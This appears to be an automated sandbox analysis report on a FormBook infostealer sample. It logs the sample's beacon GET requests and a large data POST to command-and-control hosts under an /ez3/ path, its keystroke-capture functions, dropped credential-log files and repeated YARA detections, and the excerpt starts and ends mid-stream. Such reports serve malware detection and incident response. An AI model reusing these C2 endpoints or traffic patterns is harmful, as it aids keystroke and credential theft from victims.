56 4f 38 44 56 57 46 6e 49 6a 33 57 63 71 46 72 33 36 47 32 58 64 72 4c 68 79 53 38 68 47 77 49 50 45 53 36 58 37 36 30 4c 52 48 6e 48 63 67 68 70 73 52 43 47 4e 6c 4b 38 75 5a 7e 45 72 4b 4d 7a 4d 57 67 35 4e 50 42 50 4b 53 78 52 6c 35 6e 4f 79 6e 45 76 50 58 64 58 42 47 43 6d 41 4d 53 55 7e 45 6c 69 75 51 4a 4a 64 53 7a 6c 68 4a 79 54 67 58 4e 4b 50 62 7e 51 75 4a 4a 58 62 5f 62 39 6f 66 75 46 6f 64 7a 54 76 41 46 74 44 44 79 42 34 41 64 4e 28 6e 54 46 33 55 4f 64 46 30 52 5a 34 75 74 47 5a 61 67 63 4c 61 44 4d 32 6e 58 75 6c 56 7e 70 62 49 48 45 54 4a 69 6b 50 37 53 78 67 71 6a 32 63 73 28 49 58 6c 49 37 46 79 4c 6a 4a 30 61 2d 35 45 45 79 33 75 76 63 6f 77 6a 30 7a 31 4d 59 6b 4f 69 39 76 74 46 54 58 33 46 48 30 78 4c 4b 79 75 76 53 4a 72 54 4b 6e 4a 69 38 61 4a 4e 4e 49 4e 72 36 53 56 64 72 4c 37 48 39 53 37 37 4d 61 6b 39 7a 58 63 6c 64 42 59 71 59 43 4b 33 61 45 77 49 59 5a 31 57 31 62 71 34 6b 57 64 57 72 30 64 78 39 39 45 66 48 55 6f 6a 63 71 5f 46 48 69 6e 5a 6d 7e 51 35 70 77 33 36 5f 78 74 43 4e 4d 59 63 64 42 44 49 4d 4a 34 53 38 4d 34 4c 36 46 39 38 6c 4c 78 6b 41 48 69 28 6c 6a 31 37 65 33 6a 48 65 31 39 7e 51 6b 54 4d 74 4e 34 4d 5a 70 53 65 73 68 73 64 4a 39 68 33 6d 6c 67 37 49 7a 68 43 49 58 71 4f 46 66 4c 64 6c 79 69 6f 68 47 78 77 78 75 54 5a 65 7e 6a 34 76 6d 2d 72 7a 6a 5f 65 36 70 62 54 6c 67 79 67 4a 30 59 43 43 31 30 36 56 4d 79 6b 62 64 51 6b 34 78 38 55 34 78 5f 42 6f 30 53 67 43 54 79 4e 6a 6e 33 39 54 4e 31 73 67 31 4d 71 74 36 4e 57 4a 67 4a 65 46 45 37 73 66 75 6f 58 2d 39 58 43 4f 31 59 68 33 46 78 41 30 66 47 51 39 67 32 6c 44 62 31 33 7a 6a 38 7e 63 42 74 74 68 69 47 37 58 33 55 52 58 44 37 44 6a 6f 4d 4b 77 78 65 6c 69 61 34 74 58 59 47 31 54 58 32 38 38 58 33 45 47 50 73 49 72 61 50 52 69 37 39 53 53 71 6d 74 78 4a 56 76 69 53 75 6d 79 6f 63 49 65 63 2d 6c 6b 31 35 54 6a 41 4c 32 75 75 36 6b 6c 52 45 4b 78 49 51 4b 77 56 70 35 41 6f 30 62 33 51 43 59 31 78 4d 6b 76 68 71 6e 5
 Downloads files from webservers via HTTP Show sources
 Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1Host: www.tylermercer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.oraning.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5
 Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 19 May 2020 08:38:38 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com/ez3/ Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000004.00000000.889874232.0000000007B92000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC: Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

 Contains functionality to retrieve information about pressed keystrokes Show sources
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_00449F24 GetKeyboardState, 0_2_00449F24
 Creates a DirectInput object (often for capturing keystrokes) Show sources
 Source: sdv88p2lg.exe, 0000000E.00000002.1485735250.0000000000790000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologri.ini Jump to dropped file Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrf.ini Jump to dropped file Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrv.ini Jump to dropped file
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident 